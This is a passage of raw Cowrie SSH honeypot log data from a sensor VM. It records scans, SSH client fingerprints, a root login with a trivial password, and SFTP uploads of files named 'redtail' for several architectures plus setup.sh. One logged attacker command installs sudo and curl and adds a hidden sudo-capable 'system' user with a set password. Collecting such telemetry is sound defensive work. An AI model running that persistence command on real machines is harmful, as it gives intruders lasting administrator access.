+"9/20/2024, 6:59:40.992 
AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""redtail.arm7"",""outfile"":""var/lib/cowrie/downloads/e86081329173be1acc1486a47cee17c9c7b78c50928e7bb9e05a86f1c040a746"",""shasum"":""e86081329173be1acc1486a47cee17c9c7b78c50928e7bb9e05a86f1c040a746"",""message"":""SFTP Uploaded file \""redtail.arm7\"" to var/lib/cowrie/downloads/e86081329173be1acc1486a47cee17c9c7b78c50928e7bb9e05a86f1c040a746"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:40.968162Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.019 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""redtail.arm8"",""outfile"":""var/lib/cowrie/downloads/88a339d0932322a43a5101d7afad05fa3bbcdbabe62cd5e287daa077398fef97"",""shasum"":""88a339d0932322a43a5101d7afad05fa3bbcdbabe62cd5e287daa077398fef97"",""message"":""SFTP Uploaded file \""redtail.arm8\"" to var/lib/cowrie/downloads/88a339d0932322a43a5101d7afad05fa3bbcdbabe62cd5e287daa077398fef97"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.014741Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.052 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""redtail.i686"",""outfile"":""var/lib/cowrie/downloads/42efa318e298e6069af565b5d09f30d38fc15d7ab1f1361addc9288e5a4e4d98"",""shasum"":""42efa318e298e6069af565b5d09f30d38fc15d7ab1f1361addc9288e5a4e4d98"",""message"":""SFTP Uploaded file \""redtail.i686\"" to 
var/lib/cowrie/downloads/42efa318e298e6069af565b5d09f30d38fc15d7ab1f1361addc9288e5a4e4d98"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.047776Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.085 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""redtail.x86_64"",""outfile"":""var/lib/cowrie/downloads/eb3032f0ece8e5b1e77842283868b6ce8e003c92ca84f4123e71094b4b9aa18d"",""shasum"":""eb3032f0ece8e5b1e77842283868b6ce8e003c92ca84f4123e71094b4b9aa18d"",""message"":""SFTP Uploaded file \""redtail.x86_64\"" to var/lib/cowrie/downloads/eb3032f0ece8e5b1e77842283868b6ce8e003c92ca84f4123e71094b4b9aa18d"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.079800Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.094 AM",,"{""eventid"":""cowrie.session.file_upload"",""filename"":""setup.sh"",""outfile"":""var/lib/cowrie/downloads/3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae"",""shasum"":""3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae"",""message"":""SFTP Uploaded file \""setup.sh\"" to var/lib/cowrie/downloads/3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.087707Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:41.105 
AM",,"{""eventid"":""cowrie.session.closed"",""duration"":16.612287044525146,""message"":""Connection lost after 16 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:41.095006Z"",""src_ip"":""5.182.211.148"",""session"":""de6aa0229f39""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:52.810 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""183.81.169.238"",""src_port"":52364,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""4188f92af0d3"",""protocol"":""ssh"",""message"":""New connection: 183.81.169.238:52364 (10.0.0.4:2222) [session: 4188f92af0d3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:52.809401Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:53.444 AM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:53.443277Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:53.446 
AM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""4e066189c3bbeec38c99b1855113733a"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-512"",""rsa-sha2-256"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:53.444568Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:55.094 AM",,"{""eventid"":""cowrie.login.success"",""username"":""root"",""password"":""0"",""message"":""login attempt [root/0] 
succeeded"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:55.093589Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.475 AM",,"{""eventid"":""cowrie.session.params"",""arch"":""linux-x64-lsb"",""message"":[],""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.474341Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.476 AM",,"{""eventid"":""cowrie.command.input"",""input"":""apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 aRtxS5DQ) system && sudo usermod -aG sudo system"",""message"":""CMD: apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 aRtxS5DQ) system && sudo usermod -aG sudo system"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.475847Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.479 AM",,"{""eventid"":""cowrie.command.input"",""input"":""openssl passwd -1 aRtxS5DQ"",""message"":""CMD: openssl passwd -1 aRtxS5DQ"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.477525Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.481 
AM",,"{""eventid"":""cowrie.command.failed"",""input"":""openssl passwd -1 aRtxS5DQ"",""message"":""Command not found: openssl passwd -1 aRtxS5DQ"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.480612Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.486 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt update"",""message"":""Command not found: apt update"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.484154Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.538 AM",,"{""eventid"":""cowrie.command.failed"",""input"":""apt install sudo curl -y"",""message"":""Command not found: apt install sudo curl -y"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.486785Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.879 AM",,"{""eventid"":""cowrie.log.closed"",""ttylog"":""var/lib/cowrie/tty/b9effa1884983860b5cf1d96789d066b077c07b85c793e80a07cab1e05fba938"",""size"":725,""shasum"":""b9effa1884983860b5cf1d96789d066b077c07b85c793e80a07cab1e05fba938"",""duplicate"":false,""duration"":0.40526723861694336,""message"":""Closing TTY Log: var/lib/cowrie/tty/b9effa1884983860b5cf1d96789d066b077c07b85c793e80a07cab1e05fba938 after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.878874Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 6:59:56.881 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":4.070003986358643,""message"":""Connection lost after 4 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T06:59:56.880714Z"",""src_ip"":""183.81.169.238"",""session"":""4188f92af0d3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:22:14.573 AM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""140.249.182.238"",""src_port"":33390,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""1d8486634081"",""protocol"":""ssh"",""message"":""New connection: 140.249.182.238:33390 (10.0.0.4:2222) [session: 1d8486634081]"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:22:14.572114Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 10:22:19.672 AM",,"{""eventid"":""cowrie.session.closed"",""duration"":5.0978147983551025,""message"":""Connection lost after 5 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T10:22:19.671309Z"",""src_ip"":""140.249.182.238"",""session"":""1d8486634081""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:06:26.584 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""143.110.159.157"",""src_port"":37600,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""321c943debf1"",""protocol"":""ssh"",""message"":""New connection: 143.110.159.157:37600 (10.0.0.4:2222) [session: 
321c943debf1]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:06:26.582736Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:06:26.617 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:06:26.616987Z"",""src_ip"":""143.110.159.157"",""session"":""321c943debf1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:06:26.727 PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""084386fa7ae5039bcf6f07298a05a227"",""hasshAlgorithms"":""curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha1"",""diffie-hellman-group1-sha1""],""keyAlgs"":[""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp
384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr"",""aes128-gcm@openssh.com"",""arcfour256"",""arcfour128""],""macCS"":[""hmac-sha2-256"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:06:26.724121Z"",""src_ip"":""143.110.159.157"",""session"":""321c943debf1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:06:31.618 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":5.033411026000977,""message"":""Connection lost after 5 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:06:31.617757Z"",""src_ip"":""143.110.159.157"",""session"":""321c943debf1""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:13.913 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""8.221.136.6"",""src_port"":55026,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""a7a91056107a"",""protocol"":""ssh"",""message"":""New connection: 8.221.136.6:55026 (10.0.0.4:2222) [session: a7a91056107a]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:13.912663Z""} 
+",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.164 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":3.2501230239868164,""message"":""Connection lost after 3 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.164128Z"",""src_ip"":""8.221.136.6"",""session"":""a7a91056107a""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.329 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""8.221.136.6"",""src_port"":55030,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""9077cde9f6f3"",""protocol"":""ssh"",""message"":""New connection: 8.221.136.6:55030 (10.0.0.4:2222) [session: 9077cde9f6f3]"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.327976Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.331 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-Go"",""message"":""Remote SSH version: SSH-2.0-Go"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.329746Z"",""src_ip"":""8.221.136.6"",""session"":""9077cde9f6f3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.497 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""98f63c4d9c87edbd97ed4747fa031019"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""diffie-hellman-group14-sha256"",""diffie-hellman-group14-sha1"",""ext-info-c""],""keyAlgs"":[""rsa-sha2-256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""ssh-rsa-cert-v01@openssh.com"",""ssh-dss-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""rsa-sha2-256"",""rsa-sha2-512"",""ssh-rsa"",""ssh-dss"",""ssh-ed25519""],""encCS"":[""aes128-gcm@openssh.com"",""aes256-gcm@openssh.com"",""chacha20-poly1305@openssh.com"",""aes128-ctr"",""aes192-ctr"",""aes256-ctr""],""macCS"":[""hmac-sha2-256-etm@openssh.com"",""hmac-sha2-512-etm@openssh.com"",""hmac-sha2-256"",""hmac-sha2-512"",""hmac-sha1"",""hmac-sha1-96""],""compCS"":[""none""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.495474Z"",""src_ip"":""8.221.136.6"",""session"":""9077cde9f6f3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 1:41:17.993 
PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.6627960205078125,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T13:41:17.992361Z"",""src_ip"":""8.221.136.6"",""session"":""9077cde9f6f3""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:15:59.501 PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""65.49.1.24"",""src_port"":11081,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""f484d3df8dc0"",""protocol"":""ssh"",""message"":""New connection: 65.49.1.24:11081 (10.0.0.4:2222) [session: f484d3df8dc0]"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:15:59.500372Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:15:59.502 PM",,"{""eventid"":""cowrie.client.version"",""version"":""GET / HTTP/1.1"",""message"":""Remote SSH version: GET / HTTP/1.1"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:15:59.501746Z"",""src_ip"":""65.49.1.24"",""session"":""f484d3df8dc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:15:59.503 PM",,"{""eventid"":""cowrie.session.closed"",""duration"":0.0015974044799804688,""message"":""Connection lost after 0 seconds"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:15:59.503249Z"",""src_ip"":""65.49.1.24"",""session"":""f484d3df8dc0""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:43.849 
PM",,"{""eventid"":""cowrie.session.connect"",""src_ip"":""48.216.193.37"",""src_port"":11384,""dst_ip"":""10.0.0.4"",""dst_port"":2222,""session"":""f67ac8981921"",""protocol"":""ssh"",""message"":""New connection: 48.216.193.37:11384 (10.0.0.4:2222) [session: f67ac8981921]"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:43.848307Z""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:43.850 PM",,"{""eventid"":""cowrie.client.version"",""version"":""SSH-2.0-OpenSSH_8.9"",""message"":""Remote SSH version: SSH-2.0-OpenSSH_8.9"",""sensor"":""server01"",""timestamp"":""2024-09-20T14:23:43.850219Z"",""src_ip"":""48.216.193.37"",""session"":""f67ac8981921""} +",,,"b3e3b5d0-8c0b-43a4-80ac-2965c6cfdfa0","newCowrie_CL","/subscriptions/1598f60c-b2fc-444f-af68-e88b999bc0c2/resourcegroups/rgtisensor/providers/microsoft.compute/virtualmachines/server01" +"9/20/2024, 2:23:43.855 
PM",,"{""eventid"":""cowrie.client.kex"",""hassh"":""af493dba7b79f250d4e61f2d2a34c8da"",""hasshAlgorithms"":""curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,sntrup761x25519-sha512@openssh.com,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-512,hmac-sha2-256;none,zlib@openssh.com,zlib"",""kexAlgs"":[""curve25519-sha256"",""curve25519-sha256@libssh.org"",""ecdh-sha2-nistp256"",""ecdh-sha2-nistp384"",""ecdh-sha2-nistp521"",""sntrup761x25519-sha512@openssh.com"",""diffie-hellman-group-exchange-sha256"",""diffie-hellman-group16-sha512"",""diffie-hellman-group18-sha512"",""diffie-hellman-group14-sha256"",""ext-info-c"",""kex-strict-c-v00@openssh.com""],""keyAlgs"":[""ssh-ed25519-cert-v01@openssh.com"",""ecdsa-sha2-nistp256-cert-v01@openssh.com"",""ecdsa-sha2-nistp384-cert-v01@openssh.com"",""ecdsa-sha2-nistp521-cert-v01@openssh.com"",""sk-ssh-ed25519-cert-v01@openssh.com"",""sk-ecdsa-sha2-nistp256-cert-v01@openssh.com"",""rsa-sha2-512-cert-v01@openssh.com"",""rsa-sha2-256-cert-v01@openssh.com"",""ssh-ed25519"",""ecdsa-sha2-nistp256"",""ecdsa-sha2-nistp384"",""ecdsa-sha2-nistp521"",""sk-ssh-ed25519@openssh.com"",""sk-ecdsa-sha2-nistp256@openssh.com"",""rsa-sha2-512"",""rsa-sha2-256""],""encCS"":[""aes256-ctr"",""aes192-ctr"",""aes128-ctr""],""macCS"":[""hmac-sha2-512"",""hmac-sha2-256""],""compCS"":[""none"",""zlib@openssh.com"",""zlib""],""langCS"":[""""],""message"":""SSH client hassh fingerprint: 